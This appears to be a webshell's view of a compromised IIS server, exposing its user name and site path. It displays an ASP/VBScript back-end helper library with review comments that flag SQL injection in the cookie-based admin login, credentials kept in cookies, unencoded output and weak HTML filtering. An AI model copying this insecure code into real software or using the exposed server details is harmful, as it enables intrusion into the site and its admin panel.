Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
<%
' Shared helper library for an ASP/VBScript site back end: string escaping,
' file-system helpers, Site_Menu tree rendering, list widgets, admin checks and
' an error page. Every database helper relies on a connection object named
' "conn" that is not defined in this listing.
' NOTE(review): this listing was captured from a rendered page. Several string
' literals below (for example "&", "<", " " and """) look as if HTML entities
' were decoded by the renderer; they are reproduced exactly as displayed and
' should be checked against the file on disk before drawing conclusions.

' ---- Escape a user name / password value for HTML output.
' Trims s, then replaces space, single quote, double quote, "<" and ">" with
' HTML entities and returns the result.
' NOTE(review): "&" is not escaped here, and this is HTML escaping only; it is
' not a substitute for parameterised SQL.
Function Checkin(s)
    s=Trim(s)
    s=replace(s," ","&nbsp;")
    s=replace(s,"'","&#39;")
    s=replace(s,"""","&quot;")
    s=replace(s,"<","&lt;")
    s=replace(s,">","&gt;")
    Checkin=s
end Function

' Check whether the input is numeric: returns CLng(mynum), or 0 when the
' conversion raises an error.
' mynum is not declared ByVal, so the assignment below also rewrites the
' caller's variable when one is passed by reference.
Function chk_num(mynum)
    on error resume next
    err.Clear
    mynum=clng(mynum)
    if err then
        chk_num=0
    else
        chk_num=mynum
    end if
    err.Clear
end Function

' Get the file list of a directory.
' Maps the virtual path cDir to a physical folder and returns an array with one
' comma-separated string per file: name, extension, size/1000 & "KB",
' last-modified date, and cDir & "/" & name.
' NOTE(review): cDir goes to Server.MapPath unvalidated; confirm that callers
' never pass request data here. objFSO is not declared locally and is never
' released.
Function getFileList(Byval cDir)
    dim filePath,objFolder,objFile,objFiles,i
    i=0
    redim fileList(0)
    filePath=server.mapPath(cDir)
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    set objFolder=objFso.GetFolder(filePath)
    set objFiles=objFolder.Files
    for each objFile in objFiles
        ' Grow the array by one slot per file, keeping earlier entries.
        ReDim Preserve fileList(i)
        With objFile
            fileList(i)=.name&","&Mid(.name, InStrRev(.name, ".") + 1)&","&.size/1000&"KB,"&.DateLastModified&","&cDir&"/"&.name
        End With
        i=i + 1
    next
    set objFiles=nothing
    set objFolder=nothing
    getFileList=fileList
End Function

' Test whether a directory exists.
' Returns True when the virtual path str maps to an existing folder.
Function GetIsFolder(str)
    dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    If fso.FolderExists(Server.MapPath(str)) then
        GetIsFolder = True
    Else
        GetIsFolder = False
    End if
    Set fso = nothing
End Function

' Create a directory.
' Creates the folder that the virtual path str maps to and returns True.
' There is no error handling: a failure in CreateFolder propagates to the caller.
' NOTE(review): str is not validated before Server.MapPath; confirm callers
' restrict it to an expected base directory.
Function GetCreateFolder(str)
    dim fso,f
    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    Set f = fso.CreateFolder(Server.MapPath(str))
    GetCreateFolder = True
    Set fso = nothing
End Function

' Character conversion: turns > < " ' in the input into HTML code and line
' breaks into <br />. Returns nothing (Empty) when str is Null.
' NOTE(review): as displayed, most replacement strings equal their search
' strings and the Chr(34) line is not valid VBScript; the on-disk file
' presumably holds entity literals here. Verify against the original file.
Public Function HTMLEncode(str)
    If Not IsNull(str) Then
        str = Replace(str, Chr(38), "&")
        str = replace(str, "<", "<")
        str = replace(str, ">", ">")
        str = Replace(str, Chr(32), " ")
        str = Replace(str, Chr(34), """)
        str = Replace(str, Chr(39), "'")
        str = Replace(str, Chr(9), " ")
        ' CRLF is replaced first so that a Windows line ending yields one <br />.
        str = Replace(str, Chr(13) & Chr(10), "<br />")
        str = Replace(str, Chr(10), "<br />")
        str = Replace(str, Chr(13), "<br />")
        HTMLEncode = str
    End If
End Function

' Reverse conversion: first turns <br /> back into a line feed, then restores
' > < " '. Returns nothing (Empty) when str is Null.
' NOTE(review): the same caveat about decoded entity literals applies; the
' quote line is not valid VBScript as displayed.
Public Function HTMLDncode(str)
    If Not IsNull(str) Then
        str = Replace(str, "<br />", Chr(10))
        str = Replace(str, "'", Chr(39))
        str = Replace(str, """, Chr(34))
        str = Replace(str, " ", Chr(9))
        str = Replace(str, "<", "<")
        str = Replace(str, ">",">" )
        str = Replace(str, " ", Chr(32))
        str = Replace(str, "&", Chr(38))
        str = Replace(str, "&", Chr(38))
        HTMLDncode = str
    End If
End Function

' Conversion for third-party code snippets: doubles every double quote, drops
' carriage returns and turns line feeds into <br />.
Public Function PluginsEncode(str)
    If Not IsNull(str) Then
        str = Replace(str, """", """""")
        str = Replace(str, Chr(13), "")
        str = Replace(str, Chr(10), "<br />")
        str = Replace(str, "&", "&")
        PluginsEncode = str
    End If
End Function

' Reverse conversion for third-party code snippets: collapses doubled double
' quotes and turns <br /> back into a line feed.
Public Function PluginsDncode(str)
    If Not IsNull(str) Then
        str = Replace(str, """""", """")
        str = Replace(str, "<br />", Chr(10))
        PluginsDncode = str
    End If
End Function

' Cut a title to a display width, counting from the first character.
' A character matching the CJK range in the pattern counts as width 2, any
' other character as width 1. Once the running width exceeds counts, the title
' is cut at that character and "..." is appended. Line feeds in the result
' become <br />.
' NOTE(review): the result is not HTML-encoded; callers write it straight into
' markup.
Function Sort_cutTitle(ByVal strtitle,ByVal counts)
    Dim RegExpObj,ReGCheck
    Set RegExpObj=new RegExp
    RegExpObj.Pattern="^[\u4e00-\u9fa5]+$"
    Dim l,t,c,i
    l=Len(strtitle)
    t=0
    For i=1 to l
        c=Mid(strtitle,i,1)
        ReGCheck=RegExpObj.test(c)
        If ReGCheck Then
            t=t+2
        Else
            t=t+1
        End If
        If t>counts Then
            Sort_cutTitle=left(strtitle,i)&"..."
            Exit For
        Else
            Sort_cutTitle=strtitle
        End If
    Next
    Set RegExpObj=nothing
    ' Disabled by the author:
    'Sort_cutTitle=Replace(Sort_cutTitle,Chr(32)," ")
    Sort_cutTitle=Replace(Sort_cutTitle,Chr(10),"<br />")
end Function

' Strip JS, CSS and HTML tags from markup, keeping only line breaks.
' <br />, <br> and </p> are parked as "[br]" before the tag removal and turned
' into line feeds afterwards. Returns "" for Null or blank input.
' NOTE(review): regex stripping is not a dependable XSS control. In the
' attribute pattern, "[on]" is a character class (one "o" or "n"), not the
' literal text "on". Prefer output encoding at the point of rendering.
Public Function filterhtml(Textstr)
    if isnull(Textstr) or Trim(Textstr)="" then
        filterhtml=""
        exit function
    end if
    Dim sStr, regEx
    sStr = Textstr
    sStr = replace(sStr, "<br />", "[br]")
    sStr = replace(sStr, "<br>", "[br]")
    sStr = replace(sStr, "</p>", "[br]")
    Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    regEx.Multiline = True
    ' Whole <script> elements.
    regEx.Pattern = "<script[\s\S]*?</script>"
    sStr = regEx.Replace(sStr, "")
    ' Whole <style> elements.
    regEx.Pattern = "<style[\s\S]*?</style>"
    sStr = regEx.Replace(sStr, "")
    ' Quoted attributes (see the note above about "[on]").
    regEx.Pattern = "\s[on].+?=([\""|\'])(.*?)\1"
    sStr = regEx.Replace(sStr, "")
    ' Any remaining tag.
    regEx.Pattern = "<(.[^>]*)>"
    sStr = regEx.Replace(sStr, "")
    Set regEx = Nothing
    sStr = replace(sStr, " ", Chr(32))
    sStr = replace(sStr, "[br]", Chr(10))
    filterhtml = sStr
End Function

' Strip JS, CSS and all HTML tags from markup (line breaks are not kept).
' Returns "" for Null or blank input.
' NOTE(review): the same limits as filterhtml apply; this is not a dependable
' XSS control.
Public Function filterhtmlAll(Textstr)
    if isnull(Textstr) or Trim(Textstr)="" then
        filterhtmlAll=""
        exit function
    end if
    Dim sStr, regEx
    sStr = Textstr
    Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    regEx.Multiline = True
    regEx.Pattern = "<script[\s\S]*?</script>"
    sStr = regEx.Replace(sStr, "")
    regEx.Pattern = "<style[\s\S]*?</style>"
    sStr = regEx.Replace(sStr, "")
    regEx.Pattern = "\s[on].+?=([\""|\'])(.*?)\1"
    sStr = regEx.Replace(sStr, "")
    regEx.Pattern = "<(.[^>]*)>"
    sStr = regEx.Replace(sStr, "")
    Set regEx = Nothing
    sStr = replace(sStr, " ", Chr(32))
    filterhtmlAll = sStr
End Function

' Recursively print every category under pid as a text tree.
' lvl is the current depth; it controls how many "│" prefixes are written.
' NOTE(review): pid is concatenated into the SQL text, so it must be numeric;
' nothing here enforces that (chk_num above could). "k" and "sql" are not
' declared locally, so the recursive call overwrites the caller's k and the
' last-sibling test (k=rs.recordcount) can misfire after a child level.
' Menu_Name is written without HTML encoding.
sub ClassListInput(pid,lvl)
    Dim rs,i
    set rs=server.CreateObject ("adodb.recordset")
    sql="select id,Menu_Name,Menu_Parent from Site_Menu where Menu_Parent="&pid&" and Menu_lang=1 order by Menu_Parent,Hand_ID,id"
    rs.open sql,conn,1,1
    k=1
    do while not rs.eof
        if lvl=0 then
            ' The last sibling gets the corner glyph, the others the tee glyph.
            if k=rs.recordcount then
                Response.Write("└"&rs("Menu_Name"))
            else
                Response.Write("├"&rs("Menu_Name"))
            end if
        else
            for i=1 to lvl
                response.write("│ ")
            next
            if k=rs.recordcount then
                Response.Write("└"&rs("Menu_Name"))
            else
                Response.Write("├"&rs("Menu_Name"))
            end if
        end if
        Response.Write "</br >"
        call ClassListInput(rs("id"),lvl+1)
        k=k+1
        rs.movenext
    loop
    rs.close
    set rs=nothing
end sub

' Recursively print every category under pid as <option> elements, marking the
' option whose id equals cid as selected.
' NOTE(review): the same concerns as ClassListInput apply (pid concatenated into
' SQL, undeclared k shared across recursion levels, unencoded Menu_Name).
sub SelClass(pid,lvl,cid)
    Dim rs,i
    ' Disabled by the author: opening <select> wrapper with a placeholder option.
    'if pid=0 then
    'Response.Write("<select name=""pcls"" id=""pcls"">")
    'Response.Write("<option value=""0"">--choose category--</option>")
    'end if
    set rs=server.CreateObject ("adodb.recordset")
    sql="select id,Menu_Name,Menu_Parent,Menu_ChiID from Site_Menu where Menu_Parent="&pid&" order by Menu_Parent,Hand_ID,id"
    rs.open sql,conn,1,1
    k=1
    do while not rs.eof
        Response.Write "<option value="""&rs(0)&""""
        if Trim(cstr(cid))=cstr(rs(0)) then
            Response.Write(" selected=""selected""")
        end if
        Response.Write ">"
        if lvl=0 then
            if k=rs.recordcount then
                Response.Write("└ "&rs(1))
            else
                Response.Write("├ "&rs(1))
            end if
        else
            for i=1 to lvl
                Response.Write("│ ")
            next
            if k=rs.recordcount then
                Response.Write("└ "&rs(1))
            else
                Response.Write("├ "&rs(1))
            end if
            ' Disabled by the author:
            'if rs("Menu_ChiID")>0 then
            ' Response.Write("z;")
            'end if
        end if
        Response.Write "</option>"
        call SelClass(rs("id"),lvl+1,cid)
        k=k+1
        rs.movenext
    loop
    rs.close
    set rs=nothing
    ' Disabled by the author: closing </select> tag.
    'if pid=0 then
    'Response.Write("</select>")
    'end if
end sub

' Recursively print every category under pid as <option> elements whose value
' is "?menuid=<id>", marking the option whose id equals cid as selected.
' All working variables are declared locally here, so recursion does not
' disturb the caller's counter.
' NOTE(review): pid is concatenated into the SQL text and Menu_Name is written
' without HTML encoding.
Function SearClass(pid,lvl,cid)
    Dim rsSearClass,sqlSearClass,k,i
    set rsSearClass=server.CreateObject ("adodb.recordset")
    sqlSearClass="select id,Menu_Name,Menu_Type,Menu_Parent from Site_Menu where Menu_Parent="&pid&" order by Menu_Parent,Hand_ID,id"
    rsSearClass.open sqlSearClass,conn,1,1
    k=1
    do while not rsSearClass.eof
        Response.Write "<option value=""?menuid="&rsSearClass(0)&""""
        if Trim(cstr(cid))=cstr(rsSearClass(0)) then
            Response.Write(" selected=""selected""")
        end if
        Response.Write ">"
        if lvl=0 then
            if k=rsSearClass.recordcount then
                Response.Write("└ "&rsSearClass("Menu_Name"))
            else
                Response.Write("├ "&rsSearClass("Menu_Name"))
            end if
        else
            for i=1 to lvl
                Response.Write("│ ")
            next
            if k=rsSearClass.recordcount then
                Response.Write("└ "&rsSearClass("Menu_Name"))
            else
                Response.Write("├ "&rsSearClass("Menu_Name"))
            end if
        end if
        Response.Write "</option>"
        SearClass rsSearClass("id"),lvl+1,cid
        k=k+1
        rsSearClass.movenext
    loop
    rsSearClass.close
    set rsSearClass=nothing
end Function

' Get the data table that holds the records of menu pid.
' Returns Menu_MDB of the menu itself when it is a top-level menu
' (Menu_Parent=0), otherwise Menu_MDB of its Menu_TopParent. When the menu does
' not exist, a message is written and the response ends.
' NOTE(review): pid is concatenated into the SQL text. Callers splice the
' returned value into a FROM clause, so Menu_MDB must only ever hold trusted
' table names. The recordset is not closed on the not-found branch.
Function ChkMDB(pid)
    set rsChkMDB=server.CreateObject("adodb.recordset")
    sqlChkMDB="Select Menu_MDB,Menu_TopParent,Menu_Parent from Site_Menu where id="&pid&""
    rsChkMDB.open sqlChkMDB,conn,1,1
    if rsChkMDB.eof and rsChkMDB.bof then
        Response.Write("没有此菜单的数据库")
        Response.End
    else
        if rsChkMDB("Menu_Parent")=0 then
            ChkMDB=rsChkMDB("Menu_MDB")
        else
            set rs2ChkMDB=server.CreateObject("adodb.recordset")
            sql2ChkMDB="Select Menu_MDB from Site_Menu where id="&rsChkMDB("Menu_TopParent")&""
            rs2ChkMDB.open sql2ChkMDB,conn,1,1
            ChkMDB=rs2ChkMDB("Menu_MDB")
            rs2ChkMDB.Close
            set rs2ChkMDB=nothing
        end if
        rsChkMDB.close
        set rsChkMDB=nothing
    end If
end Function

' Write the name of menu pid on its own.
' The name is written only when lvl=0; a placeholder message is written when
' the menu does not exist. No value is returned.
' NOTE(review): pid is concatenated into the SQL text and Menu_Name is written
' without HTML encoding. The recordset is not closed on the not-found branch.
Function MenuName(pid,lvl)
    set rsMenuName=server.CreateObject("adodb.recordset")
    sqlMenuName="Select id,Menu_Name,Menu_Type,Menu_Target,Menu_Link,Menu_Link_List from Site_Menu where id="&pid&""
    rsMenuName.open sqlMenuName,conn,1,1
    if rsMenuName.eof and rsMenuName.bof then
        Response.Write("暂无信息")
    else
        if lvl=0 then
            Response.Write(""&rsMenuName("Menu_Name")&"")
        end if
        rsMenuName.close
        set rsMenuName=nothing
    end If
end Function

' Count the records of a column (menu) and write the count to the response.
' When Menu_ChiID is 0 only pid is counted; otherwise the ids of the menu and
' of its descendants are gathered into a comma-separated list first.
' NOTE(review): pid is concatenated into three SQL statements, including a LIKE
' pattern; validate it as an integer before calling. rs, rs2, sql, sql2 and
' rsID are not declared locally.
Function list_infoCount(pid)
    set rs=server.CreateObject ("adodb.recordset")
    sql="select Menu_ChiID from Site_Menu where id="&pid&""
    rs.open sql,conn,1,1
    if rs.eof and rs.bof then
        Response.Write("暂无信息")
    else
        if rs("Menu_ChiID")=0 then
            rsID=pid
        else
            rsID=""
            set rs2=server.CreateObject ("adodb.recordset")
            sql2="select id from Site_Menu where id="&pid&" or Menu_Parent="&pid&" or Menu_ParentPath like '0,"&pid&",%'"
            rs2.open sql2,conn,1,1
            if rs2.eof and rs2.bof then
                Response.Write("暂无信息")
            else
                ' Build "id1,id2,..." for the IN (...) clause below.
                do while not rs2.eof
                    if rsID="" then
                        rsID=rs2(0)
                    else
                        rsID=rsID & "," & rs2(0)
                    end if
                    rs2.movenext
                loop
            end if
            rs2.close
            set rs2=nothing
        end if
    end if
    rs.close
    set rs=nothing
    set rs=server.CreateObject("adodb.recordset")
    rs.open "select count(*) as c from "&ChkMDB(pid)&" where Menu_ID in ("&rsID&")",conn,1,1
    Response.Write rs("c")
    rs.close
    set rs=nothing
end Function

' Render a list widget on the back-end home page.
'   listid    - menu id whose records are listed
'   listnum   - row limit; 0 means no limit, otherwise it becomes " top N"
'   textnum   - display width passed to Sort_cutTitle
'   liststyle - 1 = guestbook entries, 2 = products, 3 = news
' NOTE(review): listid and listnum are concatenated into SQL; validate both as
' integers. Guest_Name and Title are written into markup and alt attributes
' without HTML encoding, which lets stored content run as script in the admin
' view; encode at output. For any liststyle other than 1-3 the final rs.close
' runs on an object already set to Nothing.
Function index_list(listid,listnum,textnum,liststyle)
    if listnum=0 then
        listnum=""
    else
        listnum=" top "&listnum&""
    end if
    set rs=server.CreateObject ("adodb.recordset")
    sql="select Menu_ChiID from Site_Menu where id="&listid&""
    rs.open sql,conn,1,1
    if rs.eof and rs.bof then
        Response.Write("暂无信息")
    else
        if rs("Menu_ChiID")=0 then
            rsID=listid
        else
            rsID=""
            set rs2=server.CreateObject ("adodb.recordset")
            sql2="select id from Site_Menu where id="&listid&" or Menu_Parent="&listid&" or Menu_ParentPath like '0,"&listid&",%'"
            rs2.open sql2,conn,1,1
            if rs2.eof and rs2.bof then
                Response.Write("暂无信息")
            else
                ' Build "id1,id2,..." for the IN (...) clauses below.
                do while not rs2.eof
                    if rsID="" then
                        rsID=rs2(0)
                    else
                        rsID=rsID & "," & rs2(0)
                    end if
                    rs2.movenext
                loop
            end if
            rs2.close
            set rs2=nothing
        end if
    end if
    rs.close
    set rs=nothing
    if liststyle=1 then ' guestbook entries
        set rs=server.CreateObject ("adodb.recordset")
        sql="select"&listnum&" id,Read,Time_Add,Guest_Name from Site_Guestbook order by id desc"
        rs.open sql,conn,1,1
        if rs.eof and rs.bof then
            Response.Write("<li><center>暂无留言</center></li>")
        else
            do while not rs.eof
                Response.Write("<li onMouseOver=""this.style.backgroundColor='#eff5ff'"" onMouseOut=""this.style.backgroundColor=''""><span style=""float:right""><a href=""GuestBook_view.asp?id="&rs("id")&"""><img src=""images/info_view.gif"" alt=""查看"&rs("Guest_Name")&""" /></a></span>")
                Response.Write("<span style=""color:#666""> "&Formatdatetime(rs("Time_Add"),2)&" </span><span")
                ' Unread entries (Read=0) are shown in bold.
                if rs("Read")=0 then
                    Response.Write(" style=""font-weight:bold""")
                end if
                Response.Write(">"&Sort_cutTitle(rs("Guest_Name"),textnum)&"</span></li>")
                rs.movenext
            loop
        end if
    elseif liststyle=2 then ' products
        set rs=server.CreateObject ("adodb.recordset")
        sql="select"&listnum&" id,Time_Add,Title from "&ChkMDB(listid)&" where Menu_ID in ("&rsID&") order by Hand_ID desc,id desc"
        rs.open sql,conn,1,1
        if rs.eof and rs.bof then
            Response.Write("<li><center>暂无信息</center></li>")
        else
            do while not rs.eof
                Response.Write("<li onMouseOver=""this.style.backgroundColor='#eff5ff'"" onMouseOut=""this.style.backgroundColor=''""><span style=""float:right""><a href=""Products_edit.asp?id="&rs("id")&"&menuid="&listid&"""><img src=""images/info_edit.gif"" alt=""编辑"&rs("Title")&""" /></a> <a title=""确认删除"" href=""Products_del.asp?height=105&width=380&id="&rs("id")&"&menuid="&listid&""" class=""thickbox""><img src=""images/info_del.gif"" alt=""删除"&rs("Title")&""" /></a></span><span style=""color:#666""> "&Formatdatetime(rs("Time_Add"),2)&" </span>"&Sort_cutTitle(rs("Title"),textnum)&"</li>")
                rs.movenext
            loop
        end if
    elseif liststyle=3 then ' news
        set rs=server.CreateObject ("adodb.recordset")
        sql="select"&listnum&" id,Time_Add,Title from "&ChkMDB(listid)&" where Menu_ID in ("&rsID&") order by Hand_ID desc,id desc"
        rs.open sql,conn,1,1
        if rs.eof and rs.bof then
            Response.Write("<li><center>暂无信息</center></li>")
        else
            do while not rs.eof
                Response.Write("<li onMouseOver=""this.style.backgroundColor='#eff5ff'"" onMouseOut=""this.style.backgroundColor=''""><span style=""float:right""><a href=""News_edit.asp?id="&rs("id")&"&menuid="&listid&"""><img src=""images/info_edit.gif"" alt=""编辑"&rs("Title")&""" /></a> <a title=""确认删除"" href=""News_del.asp?height=105&width=380&id="&rs("id")&"&menuid="&listid&""" class=""thickbox""><img src=""images/info_del.gif"" alt=""删除"&rs("Title")&""" /></a></span><span style=""color:#666""> "&Formatdatetime(rs("Time_Add"),2)&" </span>"&Sort_cutTitle(rs("Title"),textnum)&"</li>")
                rs.movenext
            loop
        end if
    end if
    rs.close
    set rs=nothing
end Function

' ---- Check for a basic-level administrator.
' When both the WebCookieUser and WebCookiePass cookies are present, looks up a
' SiteControl_Admin row matching them and refreshes four cookies from that row;
' otherwise, or when no row matches, redirects to control_login.asp.
' NOTE(review): both cookie values are client-controlled and are concatenated
' into the SQL text of an authentication query. That is SQL injection on the
' login gate; bind them as ADODB.Command parameters instead. The stored
' SiteControl_LoginPass value also travels in a cookie on every request, and
' WebCookieLevel is set as a cookie; keep credentials and privilege level in
' server-side session state instead.
Function CheckAdmin1
    if Request.Cookies("WebCookieUser")<>"" And Request.Cookies("WebCookiePass")<>"" then
        set rs=server.createobject("adodb.recordset")
        sql="select * from SiteControl_Admin where SiteControl_LoginName='"&Request.Cookies("WebCookieUser")&"' and SiteControl_LoginPass='"&Request.Cookies("WebCookiePass")&"'"
        rs.open sql,conn,1,1
        if not rs.eof then
            Response.Cookies("WebCookieUser")=rs("SiteControl_LoginName")
            Response.Cookies("WebCookiePass")=rs("SiteControl_LoginPass")
            Response.Cookies("WebCookieRealName")=rs("SiteControl_RealName")
            Response.Cookies("WebCookieLevel")=rs("SiteControl_AdminLevel")
        else
            response.redirect "control_login.asp"
        end if
        rs.close
        set rs=nothing
    else
        response.redirect "control_login.asp"
    end if
end Function

' ---- Check for a mid-level administrator.
' Redirects to the login page unless WebManageSession is true, and to the main
' page with an error message unless WebManageKey is "check" or "0".
' NOTE(review): these tests read Response.Cookies, the outgoing collection, not
' what the client sent; this was presumably meant to be Session state, so
' confirm how the check behaves in practice. A cookie-based flag would be
' client-controlled either way.
Function CheckAdmin2
    if Response.Cookies("WebManageSession")<>true then response.redirect "control_login.asp"
    if Response.Cookies("WebManageSession")<>true or (Response.Cookies("WebManageKey")<>"check" and Response.Cookies("WebManageKey")<>"0") then response.redirect "control_main.asp?err=你的权限的不够!!"
end Function

' ---- Check for a top-level administrator.
' Same as CheckAdmin2, except that only WebManageKey "0" is accepted.
' NOTE(review): the same Response.Cookies concern as CheckAdmin2 applies.
Function CheckAdmin3
    if Response.Cookies("WebManageSession")<>true then response.redirect "control_login.asp"
    if Response.Cookies("WebManageSession")<>true or Response.Cookies("WebManageKey")<>"0" then response.redirect "control_main.asp?err=你的权限的不够!!"
end Function
%>
<%
' ---- Error output.
' Emits a complete HTML error page that shows errmsg and returns to the
' previous page after a five-second countdown.
' NOTE(review): errmsg is not defined in this listing and is written without
' HTML encoding; if it can carry request data (compare the "err" query
' parameter set by CheckAdmin2/3), encode it with Server.HTMLEncode.
sub error()
%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
body,html,p{margin:0px;padding:0px}
/* Clear */
.clearfix:after{content:"";display:block;height:0px;clear:both;visibility:hidden}
.clearfix{display:inline-block}
/* Hides from IE-mac \*/
* html .clearfix{height:1%}
.clearfix{display:block}
/* End hide from IE-mac */
body{background:#e9e9e9 url(/images/404_bg.gif) center repeat-y;padding:10px;color:#3e3e3e;font:14px/1.5 "\5FAE\8F6F\96C5\9ED1","\5B8B\4F53",Tahoma,Helvetica,Arial,sans-serif}
#wrapper{border:3px solid #ededed;background:#FFF;margin:0px auto;width:720px}
#top{background:url(/images/nav_bg.gif);height:70px}
#logo{float:left;text-align:center;padding-top:8px;width:210px}
#menu{float:right;font-size:12px;padding:32px 20px 0px 0px}
#menu a:link,#menu a:visited,#menu a:active{color:#FFF;text-decoration:none}
#menu a:hover{font-weight:bold}
#contact{padding:15px 15px 0px 15px}
#contact p{margin-bottom:15px;text-align:center}
#contact span{color:#186bbf}
.fun{color:#666;font-size:12px;padding:0px 20px}
.fun a:link,.fun a:visited,.fun a:active{border:1px dashed #FFF;border-bottom:1px dashed #186bbf;color:#186bbf;text-decoration:none}
.fun a:hover{border:1px dashed #186bbf}
#none404{border:#CCC 1px dashed;text-align:center}
#copyright{font-size:12px;text-align:center;padding-bottom:10px}
#copyright a:link,#copyright a:visited,#copyright a:active{border:1px dashed #FFF;border-bottom:1px dashed #186bbf;color:#186bbf;text-decoration:none}
#copyright a:hover{border:1px dashed #186bbf}
</style>
<script language="javascript" type="text/javascript">
var i = 5;
var intervalid;
intervalid = setInterval("fun()", 1000);
function fun() {
if (i == 0) {
//window.location.href = "/Default.aspx";
window.history.back(-1);
clearInterval(intervalid);
}
document.getElementById("mes").innerHTML = i;
i--;
}
</script>
<title></title>
</head>
<body>
<div id="wrapper">
<div id="top" class="clearfix">
<div id="logo"><a href="http://www.netgather.com"><img src="/images/netgather_com.gif" alt="网聚网" width="144" height="55" border="0" /></a></div>
</div>
<div id="contact">
<p><b><font color="#FF0000">Error!</font> <%=errmsg%>!</b><br />
<b><a href="javascript:history.go(-1)">返回 BACK</a></b><br />
<span id="mes" style="color:#F00">5</span>秒后将自动返回</p>
</div>
<div id="copyright">Copyright <a href="http://www.netgather.com">NetGather网聚网</a> 版权所有</div>
</div>
</body>
</html>
<%
End sub
%>